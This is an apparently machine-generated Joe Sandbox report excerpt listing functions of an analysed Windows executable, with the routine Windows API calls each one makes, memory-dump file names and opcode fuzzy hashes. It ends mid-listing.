                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 752480666-0
                                                                                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                    Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3275902921-0
                                                                                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                    Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3275902921-0
                                                                                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                    Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                    Function 0045559F Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 004555C7
                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3691411573-0
                                                                                                                    • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                    • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                                                                    • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                    • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                                                                    Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                    • EndPath.GDI32(?), ref: 004472D6
                                                                                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 372113273-0
                                                                                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                    Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                    Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                    • __lock.LIBCMT ref: 004170BE
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                    • _free.LIBCMT ref: 004170EE
                                                                                                                    • InterlockedIncrement.KERNEL32(03072D00), ref: 00417106
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3470314060-0
                                                                                                                    • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                    • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                    Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                    Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                    Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 442100245-0
                                                                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                    Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 621800784-4108050209
                                                                                                                    • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                    • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                    Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
